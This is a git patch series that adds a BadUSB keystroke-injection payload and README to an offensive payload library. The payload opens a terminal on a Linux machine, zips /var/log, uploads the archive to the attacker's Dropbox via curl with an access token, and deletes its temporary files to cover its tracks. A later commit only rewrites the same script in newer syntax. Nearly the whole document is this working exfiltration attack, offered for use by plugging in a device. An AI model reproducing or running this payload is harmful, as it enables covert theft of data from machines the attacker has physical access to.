From cf4f91d1c386de736989b8a743dbf32e2912b2c9 Mon Sep 17 00:00:00 2001
From: Aleff <alessandro.greco.1@protonmail.com>
Date: Mon, 12 Jun 2023 11:50:22 +0200
Subject: [PATCH 1/3] Exfiltrate Linux Logs With Dropbox

---
 .../ExfiltrateLinuxLogFiles/payload.txt       | 80 +++++++++++++++++++
 1 file changed, 80 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt

diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
new file mode 100644
index 0000000..dbd546f
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -0,0 +1,80 @@
+REM ######################################################
+REM #                                                    |
+REM # Title        : Exfiltrate Linux Logs With Dropbox  |
+REM # Author       : Aleff                               |
+REM # Version      : 1.0                                 |
+REM # Category     : Exfiltration, Execution             |
+REM # Target       : Linux                               |
+REM #                                                    |
+REM ######################################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Dropbox Account
+REM     - - DROPBOX_ACCESS_TOKEN
+
+
+DELAY 1000
+CTRL-ALT t
+
+REM Required: Set here your Dropbox access TOKEN
+DELAY 2000
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+
+
+DELAY 500
+STRING USER_NAME=$(whoami)
+ENTER
+
+REM Create random num
+DELAY 500
+STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
+ENTER
+
+REM Folder path
+DELAY 500
+STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
+ENTER
+
+REM Zip path
+DELAY 500
+STRING ZIP_NAME="$RANDOM.zip"
+ENTER
+DELAY 500
+STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
+ENTER
+
+REM Default log path
+DELAY 500
+STRING LOG_PATH="/var/log/"
+ENTER
+
+DELAY 500
+STRING zip -r "$ZIP_PATH" "$LOG_PATH"
+ENTER
+
+REM Delay of zipping operation - it depends
+DELAY 10000
+
+DELAY 500
+STRING DROPBOX_FOLDER="/$ZIP_NAME"
+ENTER
+
+REM Send to Dropbox function
+DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+DELAY 500
+STRING curl -X POST 
+STRING DROPBOX_API_LINK 
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+ENTER
+
+REM Send timing - it depends
+DELAY 5000
+
+DELAY 500
+STRING rm -rf "$TMP_FOLDER_PATH"
+ENTER

From 372e44e3896b74eb4c11beca2f28f19e8348e686 Mon Sep 17 00:00:00 2001
From: aleff-github <alessandro.greco.1@protonmail.com>
Date: Mon, 12 Jun 2023 11:51:00 +0200
Subject: [PATCH 2/3] Create README.md

---
 .../ExfiltrateLinuxLogFiles/README.md         | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md

diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
new file mode 100644
index 0000000..1ea1e56
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -0,0 +1,33 @@
+ 
+# Exfiltrate Linux Log Files - BADUSB ✅
+
+A script used to take linux logs.
+
+**Category**: Exfiltration, Execution
+
+[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
+
+## Description
+
+A script used to take linux logs.
+
+Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Linux System
+* * Terminal that can be opened by the shortcommand CTRL-ALT t
+* DropBox Account for the access token
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set your dropbox access token
+* Change if needed the folder path interessed (i.e. /var/log)
+* Change (if you think that it is necessary) the delay of the zipping operation

From 16d005ea73a11d8013e6623c9053e8a796993a86 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:47:26 -0400
Subject: [PATCH 3/3] Update payload.txt

---
 .../ExfiltrateLinuxLogFiles/payload.txt       | 56 +++++--------------
 1 file changed, 15 insertions(+), 41 deletions(-)

diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
index dbd546f..d5e9912 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -13,68 +13,42 @@ REM     - Internet Connection
 REM     - Dropbox Account
 REM     - - DROPBOX_ACCESS_TOKEN
 
+DEFINE #TOKEN example
+DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
 
-DELAY 1000
-CTRL-ALT t
+DEFAULT_DELAY 500
+CTRL ALT t
 
 REM Required: Set here your Dropbox access TOKEN
 DELAY 2000
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
 
-
-DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
 
 REM Create random num
-DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
 
 REM Folder path
-DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
 
 REM Zip path
-DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
-DELAY 500
-STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
+STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
 
 REM Default log path
-DELAY 500
-STRING LOG_PATH="/var/log/"
-ENTER
+STRINGLN LOG_PATH="/var/log/"
 
-DELAY 500
-STRING zip -r "$ZIP_PATH" "$LOG_PATH"
-ENTER
+STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
 
 REM Delay of zipping operation - it depends
 DELAY 10000
 
-DELAY 500
-STRING DROPBOX_FOLDER="/$ZIP_NAME"
-ENTER
+STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
 
 REM Send to Dropbox function
-DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
-DELAY 500
-STRING curl -X POST 
-STRING DROPBOX_API_LINK 
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
 
 REM Send timing - it depends
 DELAY 5000
 
-DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"